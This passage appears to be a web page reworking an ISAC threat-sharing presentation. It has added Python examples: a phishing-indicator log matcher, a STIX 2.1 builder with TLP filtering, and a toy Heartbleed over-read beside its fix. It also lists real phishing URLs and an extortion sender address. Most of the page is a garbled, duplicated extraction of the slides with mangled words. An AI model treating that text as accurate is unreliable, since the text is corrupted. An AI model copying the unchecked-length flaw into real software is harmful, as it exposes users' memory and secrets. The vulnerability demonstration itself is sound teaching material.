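        if f["subject"].lower() in iocs["subject"]:
            matched.append("subject")
        if f["sender"].lower() in iocs["sender"]:
            matched.append("sender")
        if refang(f["url"]) in iocs["url"]:
            matched.append("url")
        if f["md5"].lower() in iocs["md5"]:
            matched.append("md5")
        if matched:
            hits.append(Hit(f["ts"], f["sender"], matched,
                            delivered=(f["action"] == "deliver")))
    return hits

# Constructed sample lines: the phish blocked, the phish delivered, a benign
# mail, and a re-themed phish that still matches on URL and attachment hash.
SAMPLE_LOG = [
    '2015-06-02T09:01:12Z from=youraccount@BANKmessage.com subj="Important message from BANK" '
    'url=hxxp://www2.webmasterradio[.]fm/FanPage/Procss/Logon.html md5=- action=quarantine',
    '2015-06-02T09:01:40Z from=youraccount@bankmessage.com subj="Important message from BANK" '
    'url=hxxp://www2.webmasterradio[.]fm/FanPage/Procss/Logon.html md5=- action=deliver',
    '2015-06-02T09:02:05Z from=hr@example.org subj="Lunch menu" url=- md5=- action=deliver',
    '2015-06-02T09:03:33Z from=alerts@example.net subj="Statement" '
    'url=http://www2.webmasterradio.fm/FanPage/Procss/Logon.html '
    'md5=0123456789ABCDEF0123456789abcdef action=deliver',
]

if __name__ == "__main__":
    for h in match_log(SAMPLE_LOG):
        state = "DELIVERED" if h.delivered else "blocked"
        print(h.ts, h.sender, ",".join(h.matched_on), state)
```

Matching on more than one field matters: the fourth constructed line changed the subject and the sender but kept the landing page and the attachment, so a subject-only rule would have missed it. Counting the delivered hits also gives the number the thread's members were reporting back to each other ("90 made it through", "0 hits", "about 50 hits").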

A Common Language

• Structured Threat Information Expression (STIX) is a common language, a way for all to speak the same.

Trusted Automated eXchange of Indicator Information (TAXII)

• The goal of TAXII is to facilitate the exchange of structured cyber threat information
• Designed to support existing sharing paradigms in a more automated manner
• TAXII is a set of specifications defining the network-level activity of the exchange
• Defines services and messages to exchange data
• Does NOT dictate HOW data is handled in the back end, WHAT data is shared or WHO it is shared with
• TAXII is NOT a sharing program
• TAXII is a protocol over which STIX can be transported
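TAXII carries STIX objects but, as the slide says, decides neither what is shared nor with whom; that is the TLP decision from the earlier slide, and it has to be made before objects are published to a collection. As an added example, not code from the presentation or from any ISAC, the following Python builds STIX 2.1 indicators for the phishing URL, sender and subject from the sharing thread, marks them with the fixed TLP marking-definition IDs from the STIX 2.1 specification, and filters them for a given audience using this page's TLP definitions (FS-ISAC's wording of the time; FIRST's current TLP 2.0 defines AMBER and GREEN differently and replaces WHITE with CLEAR). STIX 2.1 JSON is an assumption: the deck predates it, and ISACs then exchanged STIX 1.x XML. Marking the subject line GREEN, and the audience names, are assumptions made only to exercise the filter.

```python
"""STIX 2.1 indicators marked with TLP, filtered per audience before publication.

Added example, not code from the presentation or any ISAC. Standard library
only. The indicator content is the phishing URL, sender and subject from the
sharing thread on this page; the marking-definition IDs are the fixed TLP
IDs from STIX 2.1 section 7.2.1.4; the audience rules follow this page's TLP
slide (FS-ISAC's wording of the time, not FIRST's current TLP 2.0).
"""
import json
import uuid
from datetime import datetime, timezone

# Fixed IDs STIX 2.1 assigns to the four TLP marking definitions.
TLP_ID = {
    "white": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
    "green": "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da",
    "amber": "marking-definition--f88d31f6-486f-44da-b317-01333bde0b82",
    "red":   "marking-definition--5e57c739-391a-4eb3-b6be-7d15ca92d5ed",
}
ID_TO_TLP = {v: k for k, v in TLP_ID.items()}

# Who may receive each colour, per the TLP slide on this page:
#   RED   -> only the defined group the item was given to
#   AMBER -> FS-ISAC members
#   GREEN -> members and partners (vendors, MSSPs, customers), never public forums
#   WHITE -> anyone
AUDIENCES = {
    "red":   {"defined-group"},
    "amber": {"defined-group", "member"},
    "green": {"defined-group", "member", "partner"},
    "white": {"defined-group", "member", "partner", "public"},
}

def _now() -> str:
    """STIX timestamp: RFC 3339 in UTC with millisecond precision."""
    return datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"

def make_indicator(pattern: str, name: str, tlp: str) -> dict:
    """Build a STIX 2.1 Indicator carrying a single TLP marking."""
    ts = _now()
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": f"indicator--{uuid.uuid4()}",
        "created": ts,
        "modified": ts,
        "name": name,
        "pattern_type": "stix",
        "pattern": pattern,
        "valid_from": ts,
        "object_marking_refs": [TLP_ID[tlp]],
    }

def tlp_of(obj: dict):
    """The object's TLP colour, or None if it carries no TLP marking."""
    for ref in obj.get("object_marking_refs", []):
        if ref in ID_TO_TLP:
            return ID_TO_TLP[ref]
    return None

def release_for(objects, audience: str) -> list:
    """Objects a given audience may be served, e.g. into that audience's TAXII collection.

    TAXII moves the objects; this is the WHO/WHAT decision it leaves to the
    sharing application. Unmarked objects are withheld: a missing label must
    fail closed, so it is treated like RED rather than like WHITE.
    """
    return [o for o in objects
            if tlp_of(o) is not None and audience in AUDIENCES[tlp_of(o)]]

def bundle(objects) -> str:
    """Wrap objects in a STIX 2.1 Bundle serialized as JSON."""
    return json.dumps({"type": "bundle", "id": f"bundle--{uuid.uuid4()}",
                       "objects": list(objects)}, indent=2)

# Indicators from the thread. The thread itself was marked TLP AMBER, so the
# URL and sender stay AMBER; the subject line alone is marked GREEN here as an
# assumption, to show the filter letting partners see less than members do.
URL_IOC = make_indicator(
    "[url:value = 'http://www2.webmasterradio.fm/FanPage/Procss/Logon.html']",
    "BANK phishing landing page", "amber")
SENDER_IOC = make_indicator(
    "[email-message:from_ref.value = 'youraccount@BANKmessage.com']",
    "BANK phishing sender", "amber")
SUBJECT_IOC = make_indicator(
    "[email-message:subject = 'Important message from BANK']",
    "BANK phishing subject line", "green")
ALL_IOCS = [URL_IOC, SENDER_IOC, SUBJECT_IOC]

if __name__ == "__main__":
    for audience in ("member", "partner", "public"):
        print(audience, [o["name"] for o in release_for(ALL_IOCS, audience)])
    print(bundle(release_for(ALL_IOCS, "partner")))
```

A member-facing collection receives all three indicators, a partner-facing collection only the GREEN one, and a public feed nothing. An object with no TLP marking is withheld from every audience: when a label is missing, the safe failure is to hold the object back, not to publish it.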

What is Cyber Threat Intelligence? 8 Constructs of STIX (diagram)

Atomic – Tactical – Operational: What threat activity are we seeing? What threats should I look for on my networks and systems, and why? Where has this threat been seen? What weaknesses does it exploit? What can I do about it?

Strategic: Who is responsible for this threat? Why do they do this? What do they do?

Threats Seen

Cyber Threat Environment

• Actors
  – Nation states
  – Terrorists
  – Criminals
  – Insiders
  – Activists/Hacktivists
  – Media
  – Vendors

Seen Last Week...

• Nuclear Exploit Kit
• OpenVAS scanning
• Angler/Neutrino
• PlugX
• DDoS
• Dridex
• Upatre/Dyre

Malware – Exploit Kits: Top Exploit Kits Seen

• Blackhole EK – Paunch, 10/13
• Infinity EK – Flash Player exploit
• Neutrino EK – mixes legitimate and non-legitimate requests to obfuscate the code
• Magnitude EK – ransomware
• Sweet Orange EK – website
• Fiesta EK – Silverlight
• Angler EK – hides behind legitimate web code
• Crimeboss EK – Java exploits

Ransomware

• CryptoLocker
• CryptoWall
• CryptoDefense
• TorrentLocker
• Darkleech

Top infections: USA, Canada, UK, India. Also saw a Singapore trend.

Delivery Mechanisms: Phishing/Spearphishing

Themes: court notice; invoice/statement; shipping (DHL, FedEx, UPS); EZ Pass; bank phish – Swift transfer; Dhgate invoice; eFax; Salesforce; reward themes; airline – Delta; WhatsApp – "You've got a voicemail"

Malware – Banking Trojans: Top Trojans Seen

• Citadel
• Kronos
• Kuluoz – Asprox
• Carberp
• Zeus
• Zberp – hybrid
• GameOver Zeus (GOZ) – P2P (arj) 9/14
• Cridex – Bugat, Feodo, Dridex
• Dyre
• Shylock – July 2014 takedown

Dyre Spreads Like A Global Virus...

• June 2014 – UK, US
• September 2014 – Salesforce.com attacked
• October 2014 – Romania, Germany and Switzerland
• November 2014 – Over 100 firms targeted
• December 2014 – Australia and China

Delivery Mechanisms: Drive-by Downloads and Watering Holes

Forbes.com, Energystar.com, AusPost-tracking.com, VA.gov, NBC.com – Citadel, 2013

Vulnerability Scanning

• Port scans – open ports
• Vulnerability scans – WordPress, Joomla, Java, Flash, OpenSSL
• Infrastructure

Vulnerabilities

• OpenSSL/Heartbleed
  – Old vulnerability
  – Allows more data than allowed to be read
  – Website vulnerability
  – Banks took the rap unfairly
• GNU Bash/Shellshock
  – Old vulnerability, 1994
  – Unix based: Linux, Apple Mac OS X
  – Went public Wednesday 9/24
  – Exploits and scanning seen almost immediately
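The slide's one-line description of Heartbleed, "allows more data than allowed to be read", is the whole bug: a length field taken from the peer and trusted without checking it against the record that carried it. As an added example, not code from the presentation or from OpenSSL, the following Python models a heartbeat responder over a bytes buffer that stands in for process memory and shows the vulnerable logic beside the fixed one. The bounds check in respond_fixed is the one the April 2014 OpenSSL patch added: the RFC 6520 requirement that type, length, payload and padding all fit inside the received record. The buffer, the secret and the record contents are constructed; nothing here speaks TLS or touches a network.

```python
"""Toy TLS heartbeat responder: the Heartbleed over-read and its fix.

Added example, not code from the presentation or from OpenSSL. A heartbeat
record (RFC 6520) is: 1 byte type, 2 bytes payload_length, payload,
>= 16 bytes padding. The bug trusted payload_length from the peer and
copied that many bytes from the start of the payload into the reply,
reading past the record into whatever sat next in process memory.
"""
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16

def build_heartbeat(payload: bytes, claimed_len=None) -> bytes:
    """Encode a heartbeat request; claimed_len lets a peer lie about the size."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", HEARTBEAT_REQUEST, claimed_len) + payload + b"\x00" * PADDING_LEN

def respond_vulnerable(memory: bytes, record_len: int) -> bytes:
    """Pre-patch logic: copy payload_length bytes, whatever the record length was.

    `memory` stands in for the process heap; the record occupies
    memory[:record_len] and the rest is adjacent data the bug exposes.
    """
    hbtype, payload_len = struct.unpack("!BH", memory[:3])
    if hbtype != HEARTBEAT_REQUEST:
        return b""
    payload = memory[3:3 + payload_len]          # over-reads when payload_len is a lie
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + payload + b"\x00" * PADDING_LEN

def respond_fixed(memory: bytes, record_len: int) -> bytes:
    """Patched logic: discard records too short for type, length, payload and padding."""
    if record_len < 1 + 2 + PADDING_LEN:         # truncated record: silently drop it
        return b""
    hbtype, payload_len = struct.unpack("!BH", memory[:3])
    if hbtype != HEARTBEAT_REQUEST:
        return b""
    if 1 + 2 + payload_len + PADDING_LEN > record_len:
        return b""                                # the check Heartbleed lacked
    payload = memory[3:3 + payload_len]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + payload + b"\x00" * PADDING_LEN

def leaked_bytes(response: bytes, record_len: int) -> bytes:
    """Bytes in a reply that came from beyond the request record: the leak itself."""
    _, payload_len = struct.unpack("!BH", response[:3])
    payload = response[3:3 + payload_len]
    in_record = record_len - 3                    # payload + padding bytes the record really held
    return payload[in_record:]

# Constructed "process memory": the honest payload is 4 bytes, but the peer
# claims 64; a session secret happens to sit right after the record.
REQUEST = build_heartbeat(b"ping", claimed_len=64)
SECRET = b"SESSIONKEY=deadbeefcafebabe;user=alice;"
MEMORY = REQUEST + SECRET + b"\x00" * 64
RECORD_LEN = len(REQUEST)     # what the TLS record layer actually received

def demo():
    """Return (bytes leaked by the vulnerable responder, reply from the fixed one)."""
    vuln = respond_vulnerable(MEMORY, RECORD_LEN)
    fixed = respond_fixed(MEMORY, RECORD_LEN)
    return leaked_bytes(vuln, RECORD_LEN), fixed

if __name__ == "__main__":
    leaked, fixed = demo()
    print("vulnerable responder leaked:", leaked)
    print("fixed responder replied:", fixed)
```

On the constructed buffer the vulnerable responder echoes the constructed secret back inside the heartbeat reply, while the fixed responder returns nothing for the lying request and still answers an honest one. Real Heartbleed requests could claim up to 64 KB per heartbeat and be repeated indefinitely, which is why private keys and session cookies were recoverable.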

      

   

Breaches

Malware: ChewBacca, Dexter, BlackPOS, Backoff

• Target – 70 million, 2013
• OPM – 21.5 million
• Premera BCBS – 11.2 million
• Community Health Systems – 4.5 million
• Anthem BCBS – 80 million
• Sony, Hacking Team

2015 Breaches Identified by the ITRC as of 8/11/2015 (Identity Theft Resource Center)
• Total breaches: 5,500 approx.
• Total records exposed: 818,004,561

DDoS

• Sony PlayStation – Lizard Squad
• Operation Ababil
• Las Vegas – gaming industry
• Israel
• DD4BC
• World Cup

Q1 2015 Compared to Q4 2014 (Akamai)
• 15% decrease in average attack time
• 35% increase in total DDoS attacks
• 42% increase in SSDP DDoS attacks (routers)
• 22% increase in application layer DDoS attacks
• 7% decrease in average attack bandwidth (170 Gbps)
• 37% increase in infrastructure layer DDoS attacks

Wiper Malware

• Shamoon – 2012
  – Attack on 30,000 Saudi Aramco workstations
  – Corrupts files and wipes devices
• South Korean attacks – 2013
  – 2 banks, a media company and an insurance company
  – Patch systems targeted and used to infect
  – Wiped Windows, Linux and UNIX OS
• Las Vegas casino – 2014
  – Wiped and destroyed files with VB bomb
• Sony – 2014
  – SMB worm tool, listening implant, backdoor, proxy tool, destructive hard drive tool, destructive targeted cleaning tool, network propagation wiper
  – Financial data destroyed; financial system still inoperable – asks for delay in filing

The Media and Vendors

Malvertising, watering holes; Syrian Electronic Army

Media/Vendor Spin Incidents
• Heartbleed – OpenSSL
• Hedge fund attack – BAE
• Russians attack financial system
• Russians hack 1.4 billion passwords – Hold Security

Other Threats

• Call center – phishing
• Mobile
• Social media – Sony executive on American Airlines
• Industrial control systems – Havex
• Espionage – VirusTotal testing for malware

Case Studies

DDoS – DD4BC

Since April 2015
• From: DD4BC Team <d4bct[AT]gmail[.]com>
• Subject: DDOS ATTACK
• Size: 500 Mbps to 50 Gbps
• Duration: up to 1 hour
• Ransom demand: 25–40 BTC

United/NYSE

• NYSE – July 8, 2015: 11:32am; 11:45am chatter; noon definitive word
• United – 8:26am, reservation system

United Parcel Service

• USSS, NCCIC and FS-ISAC collaborate to release malware analysis and risk mitigation recommendations
• Shared with Retailers Association
• UPS detected and used to mitigate malware

Questions

Page 11: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

Information Sources Communications

Best Practice Sharing -

Joint Statements -White Papers

Monthly Meetings

Daily amp Weekly ISAC

Calls

Briefings ENS Calls And Crisis

Calls

ListServ Trusted

Relationships ISAC Ops Centers

ISACs amp Other

Sectors

DHS amp Other Government Partners

Private Sector Liaison -NICC

Other Sources

(Hundreds)

PCIS

National Council of

ISACs

      

Examples of AcKviKes

ndash Increase involvement13 of sectors without13 ISACs ndash Daily Weekly Monthly and Crisis calls ndash Cross13 Sector13 InformaKon Sharing13 Portal ndash Private13 Sector13 Liaison with the13 NICC13 ndash DrillsExercises Such as NLEs Cyber Storm

bull OCFndash Implement13 Real-shy‐Time sector Threat13 Level

ReporMng Directorate

  

  

  

Points13 of13 Engagementbull NaMonal Infrastructure CoordinaMng Center (NICC) bull NaMonal Cybersecurity and CommunicaMons IntegraMon

Center (NCCIC) ndash DHS-shy‐led Unified OperaMons Watch ampWarning Center ndash Operates 24 hoursday 7 daysweek 365 days a year

bull Unified Command Group-shy‐composed of private and public sector representaMves ndash Meet13 monthly and during an incident13 as needed ndash Advise Assistant13 Secretary of CSampC on cybersecurity maOers provide subject13 maOer experMse and response as necessary during an incident13 that13 requires naMonal coordinaMon

wwwnationalcouncilofisacsorg nationalcouncilofisacsnatlisacsorg

InformaKon13 Sharing Valu e

Structur e

Trust

Information Sharing Traffic Light Protocol

curren Restricted to a defined group (eg only those present in ameeting) Information labeled RED should not be shared withanyone outside of the group

curren This information may be shared with FS-ISAC members

curren Information may be shared with FS-ISAC members andpartners (eg vendors MSSPs customers) Information in this category is not to be shared in public forums

curren This information may be shared freely and is subject to standard copyright rules

  

     

  

Types13 of13 InformaKon SharedCyber13 Threats VulnerabiliKes Incidents

uumlMalicious Sites uumlThreat13 Actors ObjecMves13

uumlThreat13 Indicators uumlTTPs Observables uumlCourses13 of AcMon13 uumlExploit13 Targets uumlDenial of Service AOacks

uumlMalicious Emails Phishing Spearphishing

uumlSogtwareVulnerabiliMes

uumlMalicious Sogtware uumlAnalysis and risk miMgaMon

uumlIncident13 response

   

Primary Ways13 InformaKon Is13 Shared

uumlPortalAlerts uumlListservers uumlAutomaMon

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

15 decrease in avg aOack Mme35 increase in total DDoS aOacks 42 increase in SSDP DDoS aOacks (routers) 22 increase in aplicaMon layer DDoS aOacks 7 decrease in average aOack bandwidth (170 Gbps) 37 increase in infrastructure layer DDoS aOacks Akamai

  

    

  

  

Wiper Malware Oslash Shamoon ndash 2012

Oslash ANack on 30000 Saudi Aramco WorkstaMons Oslash Corrupts files and wipes devices

Oslash South Korean ANacksndash13 2013 Oslash 2 banks media company and insurance company Oslash Patch systems targeted and used to infect13 Oslash Wiped windows Linux and UNIX13 OS

Oslash Las Vegas13 Casinondash 2014 Oslash Wiped and destroyed files with VB bomb

Oslash Sony ndash 2014 Oslash SMB Worm13 Tool listening implant backdoor proxy

tool destrucMve hard drive tool destrucMve targeted cleaning tool network propogaMon wiper

Oslash Financial data destroyed financial system13 sMll inoperable ndash asks for delay in filing

    

The Media and Vendors MalverMsing Watering Holes

Syrian Electronic13 Army

Media Vendor Spin Incidents

bull HeartBleed13 Open SSL bull Hedge Fund ANack -shy‐ BAEbull Russians ANack Financial System13 bull Russians Hack 14 Billion Passwords -shy‐ Hold Security

     

Other13 Threats

bull Call Center ndash Phishing bull Mobile bull Social Media ndash Sony ExecuMve on American Airlines bull Industrial Control Systems -shy‐ Havex bull Espionage ndash VirusTotal tesMng for malware

Case Studies

   

DDoS ndash DD4BC

Since April 2015 bullSubject Line bullFrom From DD4BC Team ltd4bct[AT]gmail[]comgt bullSubject DDOS ATTACK

Size 500 Mbps to 50 Gbps Duration Up to 1 hour Ransom Demand 25-40 BTC

UnitedNYSE

NYSE July 8 2015 1132am 1145am chatter Noon definitive word

UNITED 826 am Reservation System

United13 Parcel13 Service

bull USSS NCCIC FS-shy‐ISAC ndashCollaborate to releasemalware analysis and risk miMgaMon recommendaMons

bull Shared with Retailers AssociaKon

bull UPS Detected13 and used13 to miKgate Malware

QuesKons

Page 12: Case Studies in ISAC Information Sharing...ISACs • Oil and Natural Gas ISAC (ONG) • Surface TransportaMon • Water ISAC • Over the Road & Motor Coach ISAC • Public Transit

      

Examples of AcKviKes

ndash Increase involvement13 of sectors without13 ISACs ndash Daily Weekly Monthly and Crisis calls ndash Cross13 Sector13 InformaKon Sharing13 Portal ndash Private13 Sector13 Liaison with the13 NICC13 ndash DrillsExercises Such as NLEs Cyber Storm

bull OCFndash Implement13 Real-shy‐Time sector Threat13 Level

ReporMng Directorate

  

  

  

Points13 of13 Engagementbull NaMonal Infrastructure CoordinaMng Center (NICC) bull NaMonal Cybersecurity and CommunicaMons IntegraMon

Center (NCCIC) ndash DHS-shy‐led Unified OperaMons Watch ampWarning Center ndash Operates 24 hoursday 7 daysweek 365 days a year

bull Unified Command Group-shy‐composed of private and public sector representaMves ndash Meet13 monthly and during an incident13 as needed ndash Advise Assistant13 Secretary of CSampC on cybersecurity maOers provide subject13 maOer experMse and response as necessary during an incident13 that13 requires naMonal coordinaMon

wwwnationalcouncilofisacsorg nationalcouncilofisacsnatlisacsorg

InformaKon13 Sharing Valu e

Structur e

Trust

Information Sharing Traffic Light Protocol

curren Restricted to a defined group (eg only those present in ameeting) Information labeled RED should not be shared withanyone outside of the group

curren This information may be shared with FS-ISAC members

curren Information may be shared with FS-ISAC members andpartners (eg vendors MSSPs customers) Information in this category is not to be shared in public forums

curren This information may be shared freely and is subject to standard copyright rules

  

     

  

Types13 of13 InformaKon SharedCyber13 Threats VulnerabiliKes Incidents

uumlMalicious Sites uumlThreat13 Actors ObjecMves13

uumlThreat13 Indicators uumlTTPs Observables uumlCourses13 of AcMon13 uumlExploit13 Targets uumlDenial of Service AOacks

uumlMalicious Emails Phishing Spearphishing

uumlSogtwareVulnerabiliMes

uumlMalicious Sogtware uumlAnalysis and risk miMgaMon

uumlIncident13 response

   

Primary Ways13 InformaKon Is13 Shared

uumlPortalAlerts uumlListservers uumlAutomaMon

Sample of Sharing Thread

Received close to 500 so far and sMll coming in 90 made it13 through to employees before being blocked by perimeter asspam

SubjectImportant13 message from BANK Sender youraccountBANKmessagecom URL hxxpwww2webmasterradiofm FanPageProcssLogonhtml

0 hits last13 7days

Wersquove had about13 50 hits so far all arediscarded

TLP AMBER13 PROPRIETARY INFORMATION

BANK SubmiOed atakedown request13 for the phishing site

Sample of ISAC Sharing

Indicators of Compromise IP Address Subject Line MD5 TTP Malware

Ask a question Anyone else seeing What do you do in this situation How do you handlehelliphelliphelliphellip

Share a Best Practice Herersquos how wehelliphellip

Share a Mitigation Strategy Herersquos a script you can usehelliphellip We did thishelliphellip

TLP AMBER13 PROPRIETARY INFORMATION

A Common Language

sect Structured Threat Information Expression is a common language a way for all to speak the same

   

   

Trusted Automated eXchange of Indicator Information (TAXII)

sect The goal of TAXII is to facilitate the exchange of structured cyber threat information sect Designed to support existing sharing paradigms in a

more automated manner

sect TAXII is a set of specifications defining the network-level activity of the exchange sect Defines services and messages to exchange data sect Does NOT dictate HOW data is handled in the

back-end WHAT data is shared or WHO it is shared with

sect TAXII is NOT a sharing program sect TAXII is a protocol over which STIX can be

transported

What is13 Cyber13 Threat Intelligence8 Constructs13 of STIX

Atomic

Tactical

Operational

What threat activity are we seeing

What threats should I look for on my networks and systems and why

Where has this What weaknesses What can I threat been seen does it exploit do about it

Strategic

Who is responsible for this threat

Why do they do this

What do they do

Threats Seen

        

Cyber13 Threat Environment

bull Actors ndash NaMon States ndash Terrorists ndash Criminals ndash Insiders ndash AcMvistsHackMvists ndash Media13 ndash Vendors13

Seen Last Weekhellip Nuclear Exploit13 Kit13

Open VAS Scanning

AnglerNeutrino

PlugX

DDoS

Dridex13

UpatreDyre

13

xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxx

Malware-shy‐Exploit Kits Top Exploit13 Kits Seen

Blackhole EK ndash Paunch 1013 Infinity EK Flash player exploit13 Neutrino13 EK Mixes legiMmate non-shy‐legiMmate requests toobsfuscate the code Magnitude EK -shy‐ Ransomware Sweet Orange13 EK -shy‐ Website Fiesta EK -shy‐ Silverlight13 Angler EK hides behind legiMmate web code Crimeboss13 EK Java exploits

Ransomware

-shy‐Crytolocker-shy‐CryptoWall -shy‐CryptoDefense-shy‐Torrent13 Locker -shy‐Darkleach

Top infecMons USAUCanadaUKIndia Also saw Singapore trend

Delivery Mechanisms PhishingSpearphishing

Court13 NoMce InvoiceStatament13 Shipping Themes DHL Fedex UPS EZ Pass Bank Phish ndash Swigt Transfer Dhgate invoice eFax Salesforce Reward themes Airline ndash Delta13 WhatsApp ndash Yoursquove got13 a voicemail

Malware Banking Trojans Top Trojans13 Seen13

Citadel Kronos Kulouz13 ndash Asprox Carperb13 Zeus13 Zberp13 -shy‐ hybrid13 Game-shy‐over Zeus (GOZ) -shy‐ P2P (arj) 914 Cridex ndash Bugat Feodo Dridex13 DyreShylock ndash July 2014 Takedown

Dyre Spreads Like A Global Virushellip

June 2014 UK US

September 2014 Salesforcecom

Attacked

October 2014 Romania Germany

and Switzerland

November 2014 Over 100 firms

targeted

December 2014 Australia and

China

Delivery Mechanisms

Drive-shy‐by Downloads and Watering13 Holes

Forbescom13 Energystarcom13 AusPost-shy‐trackingcom13 VAgov NBCcom13 ndash Citadel 2013

  

Vulnerability Scanning

bull Port13 Scans ndash Open ports bull Vulnerability Scans -shy‐ Wordpress Joomla Java

Flash Open13 SSLbull Infrastructure

     

     

VulnerabiliKes

bull OpenSSLHeartbleed ndash Old vulnerability ndash Allows more data than allowed tondash Website vulnerability ndash Banks took rap unfairly

bull GNU BashShellshock ndash Old vulnerability 1994 ndash Unix based Linux Apple Mac13 OX13 ndash Went13 public13 Wednesday 924 ndash Exploits and scanning seen almost13 immediately

be read

      

   

Breaches Malware ChewBacca Dexter Black POS

Oslash Target 70 million -shy‐ 2013 Oslash OPM 215 million Oslash Primera BCBS 112 million Oslash Community Health Systems 45 million Oslash Anthem13 BCBS 80 million Oslash SonyHacking Team13

2015 Breaches IdenKfied by the ITRC as of13 8112015

bullTotal Breaches13 5500 approx

bullTotal Records Exposed 818004561 bullIdenAty The4 Resource Center

Backoff

      

DDoS Oslash Sony PlayStaMon ndash Lizard Squad Oslash OperaMon13 Ababil13 Oslash Las Vegas ndash Gaming Industry Oslash Israel Oslash DD4BCOslash World Cup

Q1 2015 Compared to Q4 2014

